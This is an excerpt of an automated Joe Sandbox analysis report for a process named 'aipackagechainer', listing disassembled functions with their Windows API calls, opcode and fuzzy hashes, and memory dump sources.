                                          • Opcode ID: 6af6649729dbc9819f7b703f251d9945af190a6dd9aaf94e3c2d37fb11e5f787
                                          • Instruction ID: e8f7c13fc90f808d89280f39f77c211e69f4e47db864ad1e56b3744bb72a7073
                                          • Opcode Fuzzy Hash: 6af6649729dbc9819f7b703f251d9945af190a6dd9aaf94e3c2d37fb11e5f787
                                          • Instruction Fuzzy Hash: 37019E71A48648EFD720DF98ED81F9977B4E708724F140A69E81583BD0D7757950CA10
                                          APIs
                                          • LoadLibraryExW.KERNEL32(0010C440,00000000,00000800,?,000D12A8,?,?,00000000,?,?,?,000D13D2,00000002,FlsGetValue,000FFDD8,FlsGetValue), ref: 000D1304
                                          • GetLastError.KERNEL32(?,000D12A8,?,?,00000000,?,?,?,000D13D2,00000002,FlsGetValue,000FFDD8,FlsGetValue,?,?,000CE441), ref: 000D130E
                                          • LoadLibraryExW.KERNEL32(0010C440,00000000,00000000,0008ABBC,0010C440,00000002,D11C52E5), ref: 000D1336
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: 9fba13a44a272c65a7131b8b5b38a2e2c5006e9813a8bcc1cd7bcb4b8126858d
                                          • Instruction ID: ceecaaf16bf2964d31779f0664bb2b68c22e627ea8656e198bc1a39fe336698d
                                          • Opcode Fuzzy Hash: 9fba13a44a272c65a7131b8b5b38a2e2c5006e9813a8bcc1cd7bcb4b8126858d
                                          • Instruction Fuzzy Hash: 64E01230380308B6FB501B50DC06FE83B96AB10B50F140031F90CE89F1DFA59990A669
                                          APIs
                                          • LocalFree.KERNEL32(?,?,?), ref: 00083129
                                          • LocalFree.KERNEL32(?,80004005), ref: 00083139
                                          • GetLastError.KERNEL32(?,80004005), ref: 00083177
                                          • LocalAlloc.KERNEL32(00000040,00000014,?,80004005), ref: 000831B6
                                          • GetLastError.KERNEL32(?,00000000,?,80004005), ref: 000831D0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Local$ErrorFreeLast$Alloc
                                          • String ID:
                                          • API String ID: 1946577522-0
                                          • Opcode ID: d0229f2b9a0074e41939ca8d6973eb54433c8b08fc32384571752735d52a4dee
                                          • Instruction ID: 0a51d2722d312fe17009b69e0ea59a7070427b520f7fd12ad26603bb85371370
                                          • Opcode Fuzzy Hash: d0229f2b9a0074e41939ca8d6973eb54433c8b08fc32384571752735d52a4dee
                                          • Instruction Fuzzy Hash: FB313A70604705AFEB60AF75DC48B57B7E8FF84B10F04492EE986C2550EB74E909CBA1
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(D11C52E5,00000000,00000000,00000000), ref: 000E00CB
                                            • Part of subcall function 000E40A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DFEB7,?,00000000,-00000008), ref: 000E414E
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000E0326
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000E036E
                                          • GetLastError.KERNEL32 ref: 000E0411
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                          • String ID:
                                          • API String ID: 2112829910-0
                                          • Opcode ID: 2ae22bc7310818c1d8f761c0a6008983e3958d9287f2c054a2e0fd855bc1a376
                                          • Instruction ID: 6ce22c2e728e2c20d9f5d9777c4321233e9b16bccd41bfcdb482ecb587c2903d
                                          • Opcode Fuzzy Hash: 2ae22bc7310818c1d8f761c0a6008983e3958d9287f2c054a2e0fd855bc1a376
                                          • Instruction Fuzzy Hash: 67D158B5D00298AFCB15CFA9D880AEDBBF4FF08304F18456AE955FB251D770A982CB50
                                          APIs
                                          • GetActiveWindow.USER32 ref: 0009B098
                                          • GetForegroundWindow.USER32(?,?,?,000000FF), ref: 0009B0A8
                                          • SetForegroundWindow.USER32(00000000), ref: 0009B0E4
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • OutputDebugStringW.KERNEL32(?,D11C52E5,?,?,?,000000FF,?,000A6ADC,?,?,?,?), ref: 0009B138
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Foreground$ActiveDebugHeapOutputProcessString
                                          • String ID:
                                          • API String ID: 799693181-0
                                          • Opcode ID: fdaab816a6a2be6f91063194dc57726a51b12b9f9307144d40b50cee0462f9e6
                                          • Instruction ID: 55c5214d8107679e430c95a9c1304441b2c7c83e6c1d53fbac8355bab10baefe
                                          • Opcode Fuzzy Hash: fdaab816a6a2be6f91063194dc57726a51b12b9f9307144d40b50cee0462f9e6
                                          • Instruction Fuzzy Hash: 14513471A006059FDF14DB68D9497AEB7F5EF85320F18826DE816973E1EB309D00CB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 2762dd5845e2178ff109613d1d2bf4f803f5965c72d8fcf5d303665b6282b829
                                          • Instruction ID: 6a77d1ba091de8c3fdbb6f25b3822bd45e1f6ff726bd78efa00caf8301646fc9
                                          • Opcode Fuzzy Hash: 2762dd5845e2178ff109613d1d2bf4f803f5965c72d8fcf5d303665b6282b829
                                          • Instruction Fuzzy Hash: 2B51AFB2601706AFEB298F14D841FFA77A4EF54310F14452EEA0997392E771ED90CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorEventLast
                                          • String ID:
                                          • API String ID: 3848097054-0
                                          • Opcode ID: 735cf2b1629f086f96abc6f475a4c5a03c240368f5938f3e26950c0ff7923975
                                          • Instruction ID: c9922fbca97532b67fb529e8690553c8d57a490b2e6e554e8ebd86151baea8e1
                                          • Opcode Fuzzy Hash: 735cf2b1629f086f96abc6f475a4c5a03c240368f5938f3e26950c0ff7923975
                                          • Instruction Fuzzy Hash: D06105B1901251CFEB64CF18C8D8B5A3BE5BF44318F1542A8DD489F28AD7BAD949CF90
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,?,?,?,?,?,?,00000000,000F99C5), ref: 000A9D49
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9D71
                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,00010000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9DEF
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,000F99C5,000000FF), ref: 000A9EA6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: d0045758bf8b85f623db9978faf11b0cdb4fca1abd0908c09bc56178524ef56a
                                          • Instruction ID: f7be7662181406c3579d5bfd758c3d7110027004826002e618241126dfa3c455
                                          • Opcode Fuzzy Hash: d0045758bf8b85f623db9978faf11b0cdb4fca1abd0908c09bc56178524ef56a
                                          • Instruction Fuzzy Hash: C451F372A00248EFEB20CFA4CC85BEEBBF8FF56310F244159E95567292D7745A09CB51
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?,D11C52E5,0010D600,00000000,00000000,?,?,?,?,?,?,?), ref: 0007FA0D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FA2D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FAB0
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,000F168D,000000FF), ref: 0007FADC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Close$Open
                                          • String ID:
                                          • API String ID: 2976201327-0
                                          • Opcode ID: cd640a4ddba2ea10e85d31c7628c1b02499d199d97348a9fdde26d278a5d7c46
                                          • Instruction ID: df0d8fbdb6c9705cbcb5b61cabae44d2f86e9e4c79e374d726e6282fb8317f31
                                          • Opcode Fuzzy Hash: cd640a4ddba2ea10e85d31c7628c1b02499d199d97348a9fdde26d278a5d7c46
                                          • Instruction Fuzzy Hash: E841EBB1D0121AABDB20DF95CC45FEFBBF8EF48750F144129E919A7280D7789A05CBA4
                                          APIs
                                          • SendMessageW.USER32(?), ref: 000A8E3E
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • SetWindowTextW.USER32(?,00000010), ref: 000A8E71
                                          • IsWindow.USER32(?), ref: 000A8EE6
                                          • EndDialog.USER32(?,00000001), ref: 000A8F0A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$DialogHeapMessageProcessSendText
                                          • String ID:
                                          • API String ID: 3967821603-0
                                          • Opcode ID: 380041953634d41d2fefad049e7ee9e77ee16a2559556105f0759d1fd1553bba
                                          • Instruction ID: cddeb6b87f1a8acb47b0ea8458262da041de0c9ee82145e3aa8dcf33b9b0fc13
                                          • Opcode Fuzzy Hash: 380041953634d41d2fefad049e7ee9e77ee16a2559556105f0759d1fd1553bba
                                          • Instruction Fuzzy Hash: 9C315C71601A05EFD714DF65CC48F96BBE5FF09720F108629FA25D76A0DB72A910CB90
                                          APIs
                                          • EnterCriticalSection.KERNEL32(0012BCD4,D11C52E5), ref: 0009884D
                                          • GetCurrentThreadId.KERNEL32 ref: 00098861
                                          • LeaveCriticalSection.KERNEL32(0012BCD4), ref: 0009889F
                                          • SetWindowLongW.USER32(?,00000004,00000000), ref: 000988FB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
                                          • String ID:
                                          • API String ID: 3550545212-0
                                          • Opcode ID: a9e5a251a4c7adfbd7e3c64d51b0233e8617ae69a28925645280e269313ed863
                                          • Instruction ID: 3bd9fc90d3918c3acfff2343110ba2e1c10b26351bad61ff37601807f02fdcc6
                                          • Opcode Fuzzy Hash: a9e5a251a4c7adfbd7e3c64d51b0233e8617ae69a28925645280e269313ed863
                                          • Instruction Fuzzy Hash: 1531C032A04259AFDB20CF65DC44B6BBBF8FF45720F04862AE91593750DF71A810DBA1
                                          APIs
                                            • Part of subcall function 000B39A0: SetFilePointer.KERNEL32(?,00000000,?,00000001,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000B39D5
                                            • Part of subcall function 000B39A0: GetLastError.KERNEL32(?,00000000,?,00000001,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000B39E2
                                          • GetLastError.KERNEL32 ref: 000BB0A7
                                            • Part of subcall function 000B3A40: SetFilePointer.KERNEL32(?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A7A
                                            • Part of subcall function 000B3A40: GetLastError.KERNEL32(?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A87
                                            • Part of subcall function 000B3A40: SetLastError.KERNEL32(00000000,?,?,?,?,D11C52E5,?,?,?,?,?,Function_0008C230,000000FF), ref: 000B3A9E
                                          • SetEndOfFile.KERNEL32(?), ref: 000BB056
                                          • GetLastError.KERNEL32 ref: 000BB069
                                          • SetLastError.KERNEL32(00000000), ref: 000BB08E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$File$Pointer
                                          • String ID:
                                          • API String ID: 4162258135-0
                                          • Opcode ID: fd302d138bda6328ba38f656b809004ec99e15d4c47fff2732312e62139757a8
                                          • Instruction ID: 393c98b6098d1e74125eb10372ac708f3949e9e45998e7b53a3a0eb240b0c166
                                          • Opcode Fuzzy Hash: fd302d138bda6328ba38f656b809004ec99e15d4c47fff2732312e62139757a8
                                          • Instruction Fuzzy Hash: 5721F2322102059B9720EE29EC40AFFB7D9EF80355F14462AFD64C7161EB72CC5496A1
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C94AE
                                          • GetLastError.KERNEL32 ref: 000C94B9
                                          • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 000C9521
                                          • GetLastError.KERNEL32 ref: 000C952B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$ObjectReleaseSemaphoreSingleWait
                                          • String ID:
                                          • API String ID: 1636903514-0
                                          • Opcode ID: 940144310d816ea6ea37dafb31f2f6dc6143714ea2e2506f14d344fcad64f29a
                                          • Instruction ID: e099a81f40b11cb167f183bf0f53a75f1e68d39a3cd57ec180c70a75403a2ee5
                                          • Opcode Fuzzy Hash: 940144310d816ea6ea37dafb31f2f6dc6143714ea2e2506f14d344fcad64f29a
                                          • Instruction Fuzzy Hash: 7E212132200B408BEB718F69E88CF5FB7E5BF90321F148A1DE1A5865A2E770D844DB51
                                          APIs
                                          • ResetEvent.KERNEL32(?,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADC52
                                          • GetLastError.KERNEL32(?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADC7F
                                          • WaitForSingleObject.KERNEL32(?,0000000A,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADCB5
                                          • SetEvent.KERNEL32(?,?,?,000ACF82,?,?,?,?,?,00000003,00000000,D11C52E5,?,?), ref: 000ADCD8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastObjectResetSingleWait
                                          • String ID:
                                          • API String ID: 708712559-0
                                          • Opcode ID: b480a193a3546262ed64519376ae1ff3b268bb20b5b80567ff3ef1d7ab3fe2e6
                                          • Instruction ID: c9d0ff3c605882528c3ef3a5fc4b3cf7d9640ba81a80b9e00ae13898ec69c8b2
                                          • Opcode Fuzzy Hash: b480a193a3546262ed64519376ae1ff3b268bb20b5b80567ff3ef1d7ab3fe2e6
                                          • Instruction Fuzzy Hash: 35118C316047418EEBB09B65E948B567BE6BB62330F44482FE08386E61C7B4E8C2DB50
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,?,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000A7D97
                                          • GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008C250,000000FF), ref: 000A7DB1
                                          • TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008C250,000000FF), ref: 000A7DC9
                                          • CloseHandle.KERNEL32(?,?,?,?,Function_0008C250,000000FF), ref: 000A7DD2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
                                          • String ID:
                                          • API String ID: 3774109050-0
                                          • Opcode ID: 45b82dcff4552d75efe7eb12abcecedbb15e703ece53faae9d7e375366cb01d2
                                          • Instruction ID: 4a47a9b0ef050a2061612b1f81552a10977948a4e96002c03a7630e8ed8da97b
                                          • Opcode Fuzzy Hash: 45b82dcff4552d75efe7eb12abcecedbb15e703ece53faae9d7e375366cb01d2
                                          • Instruction Fuzzy Hash: 6111A971504745AFE7218F64DD05FBAB7FCFF05710F008629F929926A0DB75A940CB50
                                          APIs
                                          • IsWindow.USER32(?), ref: 000A7FCD
                                          • DestroyWindow.USER32(?), ref: 000A7FDA
                                          • IsWindow.USER32(?), ref: 000A8034
                                          • SendMessageW.USER32(?,00000407,00000000,?), ref: 000A804D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMessageSend
                                          • String ID:
                                          • API String ID: 746073012-0
                                          • Opcode ID: fba7a6d486edd2014d99615873a75a74d3d507cdb0d96059c1e3735b4925950c
                                          • Instruction ID: 55d1a1b509a8f60069441816886b81b78771ce70eea43439a5909248af91ea71
                                          • Opcode Fuzzy Hash: fba7a6d486edd2014d99615873a75a74d3d507cdb0d96059c1e3735b4925950c
                                          • Instruction Fuzzy Hash: C8113A305093019FD390DF58C948B5ABBF0FF49700F50892EF48992660E775E944DF62
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 000CAA94
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 000CAA9F
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 000CAB0D
                                            • Part of subcall function 000CABEF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000CAC07
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 000CAABA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                          • String ID:
                                          • API String ID: 677527491-0
                                          • Opcode ID: 66965428feb604046608fd16c0d7ba592632e233b6ad145cf026345d7991daab
                                          • Instruction ID: 425f8bf5727da572af0eb7f3ce30a1d02c56816a356e40ca39ce13986347074b
                                          • Opcode Fuzzy Hash: 66965428feb604046608fd16c0d7ba592632e233b6ad145cf026345d7991daab
                                          • Instruction Fuzzy Hash: 870184B5B00159AFDB06EB20D845ABD77B2FF85314B18401DE90157792CF386E82DBD2
                                          APIs
                                          • SetEvent.KERNEL32(?), ref: 000C95C2
                                          • GetLastError.KERNEL32 ref: 000C95CC
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C95D7
                                          • GetLastError.KERNEL32 ref: 000C95E2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EventObjectSingleWait
                                          • String ID:
                                          • API String ID: 3600396749-0
                                          • Opcode ID: 62f53dd9c3d1e2b3edc14a217389fab03d53360be0cf70af59b7e891cc0a2706
                                          • Instruction ID: 29570f14d714bfdfcf57566d99530dc9a84186e95fe7eaad06321a2fa596cfe3
                                          • Opcode Fuzzy Hash: 62f53dd9c3d1e2b3edc14a217389fab03d53360be0cf70af59b7e891cc0a2706
                                          • Instruction Fuzzy Hash: BC017172104B418FE7218FA9D8C8F5BBBE5BF94330F148A1DE1A583660C775E850EB51
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,?,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000A7E47
                                          • GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008C250,000000FF), ref: 000A7E61
                                          • TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008C250,000000FF), ref: 000A7E79
                                          • CloseHandle.KERNEL32(?,?,?,?,Function_0008C250,000000FF), ref: 000A7E82
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
